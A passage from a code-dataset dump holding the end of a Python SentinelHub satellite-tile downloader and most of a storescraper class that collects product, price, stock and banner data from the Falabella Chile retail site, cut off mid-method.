((west, south),(east, north))\n    \"\"\"\n    whole_rectangle = Polygon(\n        [[long[0], lat[0]], [long[1], lat[0]], [long[1], lat[1]], [long[0], lat[1]]]\n    )\n    whole_size = get_total_size(whole_rectangle, resolution)\n    osm_splitter = BBoxSplitter(\n        [whole_rectangle],\n        CRS.WGS84,\n        split_shape=[\n            ceil(whole_size[0] / upper_size_margin),\n            ceil(whole_size[1] / upper_size_margin),\n        ],\n    )\n\n    cropped_tiles = osm_splitter.get_bbox_list()\n\n    return cropped_tiles\n\n\ndef get_eval_script(bands: List[str]) -> str:\n    \"\"\"Generates the API download script for a given list of bands,\n    according to https://sentinelhub-py.readthedocs.io/en/latest/examples/\n    ogc_request.html?highlight=evalscript#Example-11:-Evalscript\"\"\"\n    bands_len = len(bands)\n    return_string = (\",\\n                \").join(\n        [f\"sample.{band}\" for band in bands]\n    )\n    evalscript = \"\"\"\n    //VERSION=3\n    function setup() {\n        return {\n            input: [{\n                bands:\"\"\"\n\n    evalscript += f\"\"\" [{\", \".join([f'\"{band}\"' for band in bands])}],\"\"\"\n\n    evalscript += \"\"\"\n                units: \"DN\"\n            }],\n            output: {\"\"\"\n\n    evalscript += f\"\"\"\n                bands: {bands_len},\"\"\"\n\n    evalscript += \"\"\"\n                sampleType: \"INT16\"\n            }\n        };\n    }\n\n    function evaluatePixel(sample) {\n        return [\"\"\"\n\n    evalscript += f\"\"\"{return_string}\"\"\"\n\n    evalscript += \"\"\"];\n    }\n    \"\"\"\n\n    return evalscript\n\n\ndef get_used_bands_list(config: CfgNode) -> List[str]:\n    \"\"\"Returns list of bands required for the model\"\"\"\n    all_bands = config.DATASET.INPUT.CHANNELS\n    max_band = max(config.DATASET.INPUT.USED_CHANNELS)\n    return all_bands[: max_band + 1]\n\n\ndef get_date_range(year: int, season_id: int) -> Tuple[str]:\n    \"\"\"Returns start and end date of the season\n\n    Args:\n        year (int): The year of the season\n        season_id (int): The season id\n\n    Raises:\n        ValueError: If season_id is not in range [1, 4]\n\n    Returns:\n        Tuple[str]: Start and end date of the season\n    \"\"\"\n    if season_id == 1:\n        return f\"{year}-JAN-01\", f\"{year}-MAR-30\"\n    elif season_id == 2:\n        return f\"{year}-APR-01\", f\"{year}-JUN-30\"\n    elif season_id == 3:\n        return f\"{year}-JUL-01\", f\"{year}-SEP-30\"\n    elif season_id == 4:\n        return f\"{year}-OCT-01\", f\"{year}-DEC-31\"\n    else:\n        raise ValueError(\"Season id is not valid\")\n\n\ndef download_raster(\n    tile_coord: Tuple[float], config: CfgNode, year: int, season: int\n) -> np.array:\n    \"\"\"Given tile coordinates and a config, downloads the tile using the sentinelhub API\n\n    Args:\n        tile_coord (Tuple[float]): The coordinates of the tile\n        config (CfgNode): Config providing the band list and SentinelHub settings\n        year (int): The year of the season\n        season (int): The season id\n\n    Returns:\n        np.array: The downloaded tile with shape (h, w, bands)\n    \"\"\"\n\n    used_bands = get_used_bands_list(config)\n    eval_script = get_eval_script(used_bands)\n\n    cred_config = get_sentinelhub_config(config.SENTINEL_HUB.CONFIG)\n\n    start_date, end_date = get_date_range(year, season)\n\n    request_all_bands = SentinelHubRequest(\n        evalscript=eval_script,\n        input_data=[\n            SentinelHubRequest.input_data(\n                data_collection=DataCollection.SENTINEL2_L1C,\n                time_interval=(\n                    start_date,\n                    end_date,\n                ),\n                mosaicking_order=\"leastCC\",\n            )\n        ],\n        responses=[SentinelHubRequest.output_response(\"default\", MimeType.TIFF)],\n        bbox=tile_coord,\n        size=bbox_to_dimensions(tile_coord, config.SENTINEL_HUB.RESOLUTION),\n        config=cred_config,\n    )\n\n    downloaded_img = request_all_bands.get_data()[0]\n    return downloaded_img\n\n\ndef get_raster_from_coord(\n    lat: Tuple[float],\n    long: Tuple[float],\n    config: CfgNode,\n    savedir: str,\n    year: int,\n    season: int,\n) -> Dict[str, Tuple[float]]:\n    \"\"\"Given latitude and longitude of a polygon and a config with the target\n    resolution, divides the polygon into tiles, downloads them and saves them on disk\n\n    Args:\n        lat (Tuple[float]): The latitude of the polygon [south, north]\n        long (Tuple[float]): The longitude of the polygon [west, east]\n        config (CfgNode): Config providing the resolution and SentinelHub settings\n        savedir (str): The directory to save the downloaded tiles\n        year (int): The year of the season\n        season (int): The season id\n\n\n    Returns:\n        Dict[str, Tuple[float]]: Mapping from the save directory and each saved\n                                 tile path to its latitude/longitude bounds\n    \"\"\"\n    # Divide the lat and long into the appropriate number of tiles\n    tiles = get_tiles_coord(lat, long, resolution=config.SENTINEL_HUB.RESOLUTION)\n\n    # Get all rasters and save them\n    os.makedirs(savedir, exist_ok=True)\n    coords = {savedir: (lat, long)}\n    for i, tile in enumerate(tiles):\n        img = download_raster(tile, config, year, season)\n        filename = f\"tile_{i}\"\n        filepath = os.path.join(savedir, filename)\n        np.save(filepath, img)\n        tile_bounds = tile.geometry.bounds\n        tile_coord = {\n            \"lat\": [tile_bounds[1], tile_bounds[3]],\n            \"long\": [tile_bounds[0], tile_bounds[2]],\n        }\n        coords[filepath + \".png\"] = tile_coord\n\n    return coords\n","repo_name":"mintusf/land_cover_tracking","sub_path":"utils/sentinel_api.py","file_name":"sentinel_api.py","file_ext":"py","file_size_in_byte":7797,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
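The split shape computed in `get_tiles_coord` above is plain ceiling division of the raster size by the tile limit. A worked instance with illustrative pixel sizes:

from math import ceil

def split_shape(width_px, height_px, margin=2400):
    # number of tiles along each axis, mirroring the split_shape argument above
    return ceil(width_px / margin), ceil(height_px / margin)

assert split_shape(5000, 3600) == (3, 2)   # 6 tiles for a 5000 x 3600 px region
assert split_shape(2400, 2400) == (1, 1)   # a region at the limit needs a single tile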
+{"seq_id":"7210353044","text":"import json\nimport logging\nimport random\nimport re\nimport urllib\n\nimport time\n\nfrom collections import defaultdict\nfrom decimal import Decimal\n\nimport validators\nfrom bs4 import BeautifulSoup\nfrom html import unescape\n\nfrom dateutil.parser import parse\nfrom requests import TooManyRedirects\n\nfrom storescraper.categories import *\nfrom storescraper.product import Product\nfrom storescraper.store import Store\nfrom storescraper.utils import remove_words, session_with_proxy, \\\n CF_REQUEST_HEADERS, html_to_markdown\nfrom storescraper import banner_sections as bs\n\n\nclass Falabella(Store):\n preferred_discover_urls_concurrency = 3\n preferred_products_for_url_concurrency = 20\n store_and_subdomain = None\n seller = [\n ('FALABELLA', 'RETAIL'),\n (None, 'GRUPO')\n ]\n seller_blacklist = ['SODIMAC', 'TOTTUS']\n\n zones = 'PCL2281,ZL_CERRILLOS,PCL1135,3045,PCL1486,FALABELLA_FBY_SDD,' \\\n 'PCL2269,LOSC,PCL540,2020,PCL1186,FEDEX_RM_URB,PCL2520,PCL1336,' \\\n 'CHILEXPRESS_8,PCL1839,BX_R13_BASE,PCL226,SCD9039_FLEX,PCL105,' \\\n 'HUB_SALIDA_DIRECTA_RM,PCL2120,PCL1923,PCL2441,1234,PCL1223,' \\\n 'FBY_BT_CTT,PCL2661,130617,PCL25,PCL2442,BLUE_RM_URBANO,PCL115,' \\\n 'RM,PCL94,PCL2511,PCL108,13,PCL861,CHILE_INTERNATIONAL,PCL1364,' \\\n 'PCL109,PCL184'\n\n category_paths = [\n ['cat720161', [CELL], 'Home > Tecnología-Telefonía > Celulares y Teléf'\n 'onos > Smartphones', 1],\n ['cat1280018', [CELL], 'Home > Tecnología-Telefonía > Celulares y Telé'\n 'fonos > Celulares Básicos', 1],\n ['cat1640002', [HEADPHONES], 'Home > Tecnología-Audio > Audífonos', 1],\n ['cat70037', [MEMORY_CARD], 'Home > Tecnología-Telefonía > Accesorios '\n 'Celulares > Tarjetas de Memoria', 1],\n ['cat4290064', [WEARABLE], 'Home > Tecnología-Wearables > Smartband',\n 1],\n ['cat4290063', [WEARABLE], 'Home > Tecnología-Wearables > SmartWatch',\n 1],\n ['cat429001', [WEARABLE], 'Home > Tecnología-Wearables > SmartWatch In'\n 'fantil', 1],\n ['cat1012', [TELEVISION], 'Home > Tecnología-TV y Video', 0],\n ['cat7190148', [TELEVISION], 'Home > Tecnología-TV > Smart TV', 1],\n ['cat7190148',\n [TELEVISION],\n 'Home > Tecnología-TV > Smart tv entre 50\" - 55\"', 1,\n {'f.variant.custom.Tamaño_de_la_pantalla': '50::55'}],\n ['cat7190148',\n [TELEVISION],\n 'Home > Tecnología-TV > Smart tv sobre 55\"', 1,\n {'f.variant.custom.Tamaño_de_la_pantalla':\n '58::60::65::68::70::75::77::85::86'}],\n ['cat7190148',\n [TELEVISION],\n 'Home > Tecnología-TV > Smart tv menores a 50\"', 1,\n {\n 'f.variant.custom.Tamaño_de_la_pantalla':\n '1::20::24::32::39::40::42::43::48'}],\n ['cat2070', [PROJECTOR], 'Home > Tecnología-TV > Proyectores', 1],\n ['cat2005', [STEREO_SYSTEM], 'Home > Tecnología-Audio', 0],\n ['cat3091', [STEREO_SYSTEM], 'Home > Tecnología-Audio > Equipos de Mús'\n 'ica y Karaokes', 1],\n ['cat3203', [STEREO_SYSTEM], 'Home > Tecnología-Audio > Hi-Fi', 1],\n ['cat3171', [STEREO_SYSTEM], 'Home > Tecnología-Audio > Parlantes Blue'\n 'tooth', 1],\n ['cat2045', [STEREO_SYSTEM], 'Home > Tecnología-Audio > Soundbar y Hom'\n 'e Theater', 1],\n ['cat3155', [MOUSE], 'Home > Tecnología-Computadores > Accesorios Comp'\n 'utación > Mouse', 1],\n ['cat2370002', [KEYBOARD], 'Home > Tecnología-Computadores > Accesorio'\n 's Computación > Teclados', 1],\n ['cat3239', [STEREO_SYSTEM], 'Home > Tecnología-Computadores > Accesor'\n 'ios Computación > Parlantes y Subwoofer', 1],\n ['CATG11879', [VIDEO_CARD], 'Home > Tecnología-Computadores > Accesori'\n 'os Computación > Tarjetas de Video', 1],\n ['cat40051', 
[ALL_IN_ONE], 'Home > Tecnología-Computadores > All in on'\n 'e', 1],\n ['cat3087', [EXTERNAL_STORAGE_DRIVE], 'Home > Tecnología-Computadores '\n '> Almacenamiento > Discos duros', 1],\n ['cat3177', [USB_FLASH_DRIVE], 'Home > Tecnología-Computación > Almace'\n 'namiento > Pendrives', 1],\n ['cat1820006', [PRINTER], 'Home > Tecnología-Computadores > Impresoras'\n ' y Tintas > Impresoras Multifuncionales', 1],\n ['cat1820004', [PRINTER], 'Home > Tecnología-Computadores > Impresoras'\n ' y Tintas > Impresoras', 1],\n ['cat6680042', [PRINTER], 'Home > Tecnología-Computadores > Impresoras'\n ' y Tintas > Impresoras Tradicionales', 1],\n ['cat11970007', [PRINTER], 'Home > Tecnología-Computadores > Impresora'\n 's y Tintas > Impresoras Láser', 1],\n ['cat2062', [MONITOR], 'Home > Tecnología-Computadores > Monitores',\n 1],\n ['cat70057', [NOTEBOOK], 'Home > Tecnología-Computadores > Notebooks',\n 1],\n ['cat7230007', [TABLET], 'Home > Tecnología-Computadores > Tablets',\n 1],\n ['cat4930009', [HEADPHONES], 'Home > Tecnología-Computadores > Accesor'\n 'ios gamer > Audífonos gamer', 1],\n ['CATG19011', [GAMING_CHAIR], 'Home > Tecnología-Computadores > Acceso'\n 'rios gamer > Sillas gamer', 1],\n ['CATG19012', [COMPUTER_CASE], 'Home > Tecnología-Computadores > Acces'\n 'orios gamer > Gabinete gamer', 1],\n ['CATG19008', [KEYBOARD], 'Home > Tecnología-Computadores > Accesorios'\n ' gamer > Tecaldos gamer', 1],\n ['CATG19007', [MOUSE], 'Home > Tecnología-Computadores > Accesorios ga'\n 'mer > Mouse gamer', 1],\n ['cat202303', [VIDEO_GAME_CONSOLE], 'Home > Tecnología-Videojuegos > C'\n 'onsolas', 1],\n ['cat3114', [OVEN], 'Home > Electrohogar-Electrodomésticos Cocina > Ho'\n 'rnos Eléctricos', 1],\n ['cat3151', [OVEN], 'Home > Electrohogar-Electrodomésticos Cocina > Mi'\n 'croondas', 1],\n ['cat3136', [WASHING_MACHINE], 'Home > Electrohogar-Línea blanca > Lav'\n 'ado', 1],\n ['cat4060', [WASHING_MACHINE], 'Home > Electrohogar-Línea blanca > Lav'\n 'ado > Lavadoras', 1],\n ['cat1700002', [WASHING_MACHINE], 'Home > Electrohogar-Línea blanca > '\n 'Lavado > Lavadoras-Secadoras', 1],\n ['cat4088', [WASHING_MACHINE], 'Home > Electrohogar-Línea blanca > Lav'\n 'ado > Secadoras', 1],\n ['cat4061', [DISH_WASHER], 'Home > Electrohogar-Línea blanca > Lavado '\n '> Lavavajillas', 1],\n ['cat3205', [REFRIGERATOR], 'Home > Electrohogar-Línea Blanca > Refrig'\n 'eración > Refrigeradores', 1],\n ['cat4091', [REFRIGERATOR], 'Home > Electrohogar-Línea Blanca > Refrig'\n 'eración > Refrigeradores > '\n 'Side by side', 1],\n ['cat4054', [OVEN], 'Home > Electrohogar-Línea blanca > Cocina > Horno'\n 's Empotrables', 1],\n ['cat2019', [AIR_CONDITIONER], 'Home > Electrohogar-Climatización > Ai'\n 're acondicionado', 1],\n ['cat4850013', [NOTEBOOK], 'Home > Especiales-Otras categorias > PC ga'\n 'mer', 1],\n ['cat3025', [VACUUM_CLEANER], 'Home > Electrohogar-Aspirado y Limpieza'\n ' > Aspiradoras', 1],\n ['cat70028', [CAMERA], 'Home > Tecnología-Fotografía > Cámaras Compact'\n 'as', 1],\n ['cat70029', [CAMERA], 'Home > Tecnología-Fotografía > Cámaras Semipro'\n 'fesionales', 1],\n ['cat1130010', [STEREO_SYSTEM], 'Home > Tecnología-Audio > Tornamesas',\n 1],\n ['cat9900007', [SPACE_HEATER], 'Home > Electrohogar-Calefacción > Cale'\n 'facción > Estufas Parafina Láser', 1],\n ['cat9910024', [SPACE_HEATER], 'Home > Electrohogar-Calefacción > Cale'\n 'facción > Estufas Gas', 1],\n ['cat9910006', [SPACE_HEATER], 'Home > Electrohogar-Calefacción > Cale'\n 'facción > Estufas Eléctricas', 1],\n ['cat9910027', [SPACE_HEATER], 'Home > 
Electrohogar-Calefacción > Cale'\n 'facción > Estufas Pellet y Leña', 1],\n # ['CATG10194', [GROCERIES], 'Despensa', 1]\n ]\n\n @classmethod\n def categories(cls):\n cats = []\n for entry in cls.category_paths:\n for cat in entry[1]:\n if cat not in cats:\n cats.append(cat)\n\n return cats\n\n @classmethod\n def discover_entries_for_category(cls, category, extra_args=None):\n category_paths = cls.category_paths\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS['User-Agent']\n product_entries = defaultdict(lambda: [])\n\n for e in category_paths:\n category_id, local_categories, section_name, \\\n category_weight = e[:4]\n\n if len(e) == 5:\n extra_params = e[4]\n else:\n extra_params = {}\n\n if category not in local_categories:\n continue\n\n for seller_id, section_prefix in cls.seller:\n category_product_urls = cls._get_product_urls(\n session, category_id, extra_params, seller_id)\n\n if section_prefix:\n full_section_name = '{} > {}'.format(section_prefix,\n section_name)\n else:\n full_section_name = section_name\n\n for idx, url in enumerate(category_product_urls):\n product_entries[url].append({\n 'category_weight': category_weight,\n 'section_name': full_section_name,\n 'value': idx + 1\n })\n\n return product_entries\n\n @classmethod\n def discover_urls_for_keyword(cls, keyword, threshold, extra_args=None):\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS['User-Agent']\n\n base_url = \"https://www.falabella.com/falabella-cl/search?\" \\\n \"Ntt={}&page={}\"\n\n discovered_urls = []\n page = 1\n while True:\n if page > 150:\n raise Exception('Page overflow ' + keyword)\n\n search_url = base_url.format(keyword, page)\n res = session.get(search_url, timeout=30)\n\n if res.status_code == 500:\n break\n\n soup = BeautifulSoup(res.text, 'html.parser')\n\n script = soup.find('script', {'id': '__NEXT_DATA__'})\n json_data = json.loads(script.text)\n\n if 'results' not in json_data['props']['pageProps']:\n break\n\n for product_data in json_data['props']['pageProps']['results']:\n product_url = product_data['url']\n discovered_urls.append(product_url)\n\n if len(discovered_urls) == threshold:\n return discovered_urls\n\n page += 1\n\n return discovered_urls\n\n @classmethod\n def products_for_url(cls, url, category=None, extra_args=None):\n print(url)\n extra_args = extra_args or {}\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS['User-Agent']\n\n for i in range(3):\n try:\n response = session.get(url, timeout=30)\n except TooManyRedirects:\n return []\n except UnicodeDecodeError:\n return []\n\n if response.status_code in [404, 500]:\n return []\n\n if 'notFound' in response.url:\n return []\n\n content = response.text.replace('
', '')\n\n if 'NEXT_DATA' in content:\n print('OLD')\n return cls._products_for_url(\n url, content, session,\n category=category, extra_args=extra_args)\n else:\n raise Exception('Invalid product type')\n\n @classmethod\n def _get_product_urls(cls, session, category_id, extra_params, seller_id):\n discovered_urls = []\n # For some reason the \"categoryName\" param activates the sponsored\n # results\n base_url = 'https://www.falabella.com/s/browse/v1/listing/cl?' \\\n '&categoryId={}&categoryName=foo&sortBy={}&page={}'\n\n for key, value in extra_params.items():\n base_url += '&{}={}'.format(key, urllib.parse.quote(value))\n\n base_url += '&zones={}'.format(urllib.parse.quote(cls.zones))\n\n # The first sorting will be given preference for\n # section position information\n\n sortings = [\n '_score%2Cdesc',\n 'derived.price.search%2Casc',\n 'product.brandName%2Casc',\n 'product.attribute.newIconExpiryDate%2Cdesc',\n 'product.averageOverallRating%2Cdesc'\n ]\n\n for idx, sorting in enumerate(sortings):\n page = 1\n\n while True:\n if page > 210:\n raise Exception('Page overflow: ' + category_id)\n\n pag_url = base_url.format(category_id, sorting,\n page)\n\n if cls.store_and_subdomain:\n pag_url += '&subdomain={}&store={}'.format(\n cls.store_and_subdomain, cls.store_and_subdomain)\n\n if seller_id:\n pag_url += '&f.derived.variant.sellerId={}'.format(\n seller_id)\n\n print(pag_url)\n\n res = cls.retrieve_json_page(session, pag_url)\n\n if 'results' not in res or not res['results']:\n if page == 1:\n logging.warning(\n 'Empty category: {}'.format(category_id))\n break\n\n for result in res['results']:\n product_url = result['url']\n # Remove weird special characters\n product_url = product_url.encode(\n 'ascii', 'ignore').decode('ascii')\n\n if '?' in product_url:\n product_url = '{}/{}'.format(product_url.split('?')\n [0], result['skuId'])\n\n if product_url not in discovered_urls:\n discovered_urls.append(product_url)\n\n page += 1\n\n return discovered_urls\n\n @classmethod\n def retrieve_json_page(cls, session, url, retries=5):\n if '?' 
in url:\n separator = '&'\n else:\n separator = '?'\n\n modified_url = '{}{}v={}'.format(url, separator, random.random())\n\n try:\n res = session.get(modified_url, timeout=30)\n return json.loads(res.content.decode('utf-8'))['data']\n except Exception:\n if retries > 0:\n time.sleep(3)\n return cls.retrieve_json_page(session, url, retries=retries-1)\n else:\n raise\n\n @classmethod\n def _products_for_url(\n cls, url, content, session, category=None, extra_args=None):\n soup = BeautifulSoup(content, 'html.parser')\n next_container = soup.find('script', {'id': '__NEXT_DATA__'})\n\n if not next_container:\n return []\n\n product_data = json.loads(\n next_container.text)[\n 'props']['pageProps']['productData']\n\n specification_tag = soup.find('div', 'productInfoContainer')\n long_description = product_data['longDescription']\n\n if long_description:\n description_soup = BeautifulSoup(\n unescape(long_description), 'html.parser')\n else:\n description_soup = None\n\n panels = [specification_tag, description_soup]\n video_urls = []\n description = ''\n\n for panel in panels:\n if not panel:\n continue\n\n description += html_to_markdown(str(panel))\n\n for iframe in panel.findAll('iframe'):\n if 'src' not in iframe.attrs:\n continue\n\n match = re.search(\n r'//www.youtube.com/embed/(.+)\\?', iframe['src'])\n if not match:\n match = re.search(\n r'//www.youtube.com/embed/(.+)', iframe['src'])\n if match:\n video_url = 'https://www.youtube.com/watch?v={}'.format(\n match.groups()[0].strip())\n if validators.url(video_url):\n video_urls.append(video_url)\n\n slug = product_data['slug']\n publication_id = product_data['id']\n brand = product_data['brandName'] or 'Genérico'\n base_name = '{} {}'.format(brand, product_data['name'])\n # Remove weird unicode characters\n base_name = base_name.encode('ascii', 'ignore').decode('ascii')\n\n products = []\n\n if 'variants' not in product_data:\n return []\n\n reviews_url = 'https://api.bazaarvoice.com/data/display/' \\\n '0.2alpha/product/summary?PassKey=' \\\n 'm8bzx1s49996pkz12xvk6gh2e&productid={}&' \\\n 'contentType=reviews,questions&' \\\n 'reviewDistribution=primaryRating,' \\\n 'recommended&rev=0'.format(product_data['id'])\n\n review_data = json.loads(session.get(reviews_url, timeout=30).text)\n review_count = review_data['reviewSummary']['numReviews']\n review_avg_score = review_data['reviewSummary']['primaryRating'][\n 'average']\n\n is_international_shipping = product_data[\n 'internationalShipping']['applicable']\n\n for model in product_data['variants']:\n sku = model['id']\n sku_url = 'https://www.falabella.com/falabella-cl/product/{}/{}/' \\\n '{}'.format(publication_id, slug, sku)\n\n prices = {e['type']: e for e in model['prices']}\n\n if not prices:\n continue\n\n normal_price_keys = ['eventPrice', 'internetPrice', 'normalPrice']\n offer_price_keys = ['cmrPrice', 'eventPrice']\n\n normal_price = None\n offer_price = None\n\n for key in normal_price_keys:\n if key not in prices:\n continue\n normal_price = Decimal(remove_words(prices[key]['price'][0]))\n if normal_price.is_finite():\n break\n else:\n normal_price = None\n\n for key in offer_price_keys:\n if key not in prices:\n continue\n offer_price = Decimal(remove_words(prices[key]['price'][0]))\n if offer_price.is_finite():\n break\n else:\n offer_price = None\n\n if not normal_price and not offer_price:\n # No valid prices found\n continue\n\n if not offer_price:\n offer_price = normal_price\n\n if not normal_price:\n normal_price = offer_price\n\n if normal_price == 
Decimal('9999999') or \\\n offer_price == Decimal('9999999'):\n continue\n\n seller_entry = None\n\n if model['offerings'] and 'sellerName' in model['offerings'][0]:\n if 'falabella' not in \\\n model['offerings'][0]['sellerName'].lower():\n seller_entry = model['offerings'][0]\n elif model['offerings'] and 'sellerId' in model['offerings'][0]:\n if 'falabella' not in \\\n model['offerings'][0]['sellerId'].lower():\n seller_entry = model['offerings'][0]\n\n stock = 0\n\n if seller_entry:\n seller = seller_entry.get('sellerName',\n seller_entry['sellerId']) or None\n\n if is_international_shipping:\n stock = 0\n elif seller in cls.seller_blacklist:\n stock = 0\n else:\n if seller_entry.get('sellerProductStatus', None) == \\\n 'ACTIVO' or seller_entry.get('isActive', False):\n stock = -1\n else:\n stock = 0\n else:\n seller = None\n if not is_international_shipping and \\\n model.get('isPurchaseable', True):\n availabilities = model['availability']\n\n for availability in availabilities:\n if availability['shippingOptionType'] in \\\n ['All', 'HomeDelivery', 'SiteToStore',\n 'PickupInStore']:\n if availability['quantity']:\n stock = -1\n break\n else:\n stock = 0\n\n if 'reacondicionado' in base_name.lower():\n condition = 'https://schema.org/RefurbishedCondition'\n elif 'reacondicionado' in description.lower():\n condition = 'https://schema.org/RefurbishedCondition'\n else:\n condition = 'https://schema.org/NewCondition'\n\n picture_urls = [x['url'] + '?scl=1.0' for x in model['medias'] if validators.url(x['url'])]\n model_name = model['name'].encode(\n 'ascii', 'ignore').decode('ascii')\n\n p = Product(\n '{} ({})'.format(base_name, model_name)[:200],\n cls.__name__,\n category,\n sku_url,\n url,\n sku,\n stock,\n normal_price,\n offer_price,\n 'CLP',\n sku=sku,\n picture_urls=picture_urls,\n video_urls=video_urls,\n review_count=review_count,\n review_avg_score=review_avg_score,\n condition=condition,\n seller=seller,\n description=description\n )\n\n products.append(p)\n\n return products\n\n @classmethod\n def banners(cls, extra_args=None):\n base_url = 'https://www.falabella.com/falabella-cl/{}'\n\n sections_data = [\n [bs.HOME, 'Home', bs.SUBSECTION_TYPE_HOME, ''],\n\n # # CATEGORY PAGES # #\n [bs.REFRIGERATION, 'Electrohogar-Refrigeradores',\n bs.SUBSECTION_TYPE_CATEGORY_PAGE,\n 'category/cat3205/Refrigeradores?isLanding=true'],\n # [bs.WASHING_MACHINES, 'Electrohogar-Lavado',\n # bs.SUBSECTION_TYPE_CATEGORY_PAGE,\n # 'category/cat3136/Lavado?isLanding=true'],\n # [bs.TELEVISIONS, 'TV', bs.SUBSECTION_TYPE_CATEGORY_PAGE,\n # 'category/cat1012/TV?isLanding=true'],\n [bs.AUDIO, 'Audio', bs.SUBSECTION_TYPE_CATEGORY_PAGE,\n 'category/cat2005/Audio?isLanding=true'],\n [bs.CELLS, 'Telefonía-Celulares y Teléfonos',\n bs.SUBSECTION_TYPE_CATEGORY_PAGE,\n 'category/cat2018/Celulares-y-Telefonos?isLanding=true'],\n\n # # MOSAICS ##\n [bs.LINEA_BLANCA_FALABELLA, 'Electro y Tecnología-Línea Blanca',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat7090035/Linea-Blanca?isPLP=1'],\n [bs.REFRIGERATION, 'Refrigeradores-No Frost',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat4074/No-Frost'],\n [bs.REFRIGERATION, 'Refrigeradores-Side by Side',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat4091/Side-by-Side'],\n [bs.WASHING_MACHINES, 'Lavadoras', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3136/Lavadoras'],\n [bs.WASHING_MACHINES, 'Lavadoras-Lavadoras',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat4060/Lavadoras'],\n [bs.WASHING_MACHINES, 'Lavadoras-Lavadoras-Secadoras',\n bs.SUBSECTION_TYPE_MOSAIC,\n 
'category/cat1700002/Lavadoras-Secadoras'],\n [bs.WASHING_MACHINES, 'Lavadoras-Secadoras',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat4088/Secadoras'],\n [bs.WASHING_MACHINES, ' Lavadoras-Lavadoras Doble Carga',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat11400002/Lavadoras-Doble-Carga'],\n [bs.TELEVISIONS, 'Tecnología-TV', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat1012/TV?isPLP=1'],\n [bs.TELEVISIONS, 'Televisores LED', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat7190148/Televisores-LED'],\n [bs.TELEVISIONS, 'LEDs menores a 50 pulgadas',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat11161614/LEDs-menores-a-50-pulgadas'],\n [bs.TELEVISIONS, 'LEDs entre 50 - 55 pulgadas',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat11161675/LEDs-entre-50---55-pulgadas'],\n [bs.TELEVISIONS, 'LEDs sobre 55 pulgadas',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat11161679/LEDs-sobre-55-pulgadas'],\n [bs.TELEVISIONS, 'TV-LED', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat2850014/LED'],\n [bs.TELEVISIONS, 'TV-Smart TV', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3040054/Smart-TV'],\n [bs.TELEVISIONS, 'TV-4K UHD', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3990038/4K-UHD'],\n [bs.TELEVISIONS, 'TV-Televisores OLED', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat2850016/Televisores-OLED'],\n [bs.TELEVISIONS, 'TV-Pulgadas Altas',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat12910024/Televisores-LED-Desde-65\"'],\n [bs.AUDIO, 'Audio-Soundbar y Home Theater',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat2045/Home-Theater'],\n [bs.AUDIO, 'Home Theater', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3050040/Home-Theater'],\n [bs.AUDIO, 'Soundbar', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat1700004/Soundbar'],\n [bs.AUDIO, 'Minicomponente', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat70018/Minicomponente'],\n [bs.AUDIO, 'Audio-Equipos de Música y Karaokes',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3091/?mkid=CA_P2_MIO1_024794'],\n [bs.AUDIO, 'Audio-Hi-Fi', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3203/Hi-Fi'],\n [bs.AUDIO, 'Audio', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat2005/Audio?isPLP=1'],\n [bs.CELLS, 'Smartphones', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat720161/Smartphones'],\n [bs.CELLS, 'Electro y Tecnología-Teléfonos',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat2018/Telefonos?isPLP=1'],\n ]\n\n banners = []\n\n for section, subsection, subsection_type, url_suffix in sections_data:\n url = base_url.format(url_suffix)\n print(url)\n\n if subsection_type == bs.SUBSECTION_TYPE_HOME:\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS[\n 'User-Agent']\n soup = BeautifulSoup(session.get(url, timeout=30).text,\n 'html.parser')\n next_data = json.loads(soup.find(\n 'script', {'id': '__NEXT_DATA__'}).text)\n\n for container in \\\n next_data['props']['pageProps']['page']['containers']:\n if container['key'] == 'showcase':\n showcase_container = container\n break\n else:\n raise Exception('No showcase container found')\n\n slides = showcase_container['components'][1]['data']['slides']\n\n for idx, slide in enumerate(slides):\n main_url = slide.get('mainUrl', None)\n if main_url:\n destination_urls = [main_url]\n elif slide['type'] == 'background_image_only':\n destination_urls = []\n else:\n destination_urls = list(\n {slide['urlLeft'], slide['urlRight']})\n picture_url = slide['imgBackgroundDesktopUrl']\n\n banners.append({\n 'url': url,\n 'picture_url': picture_url,\n 'destination_urls': destination_urls,\n 'key': picture_url,\n 'position': idx + 1,\n 'section': section,\n 'subsection': 
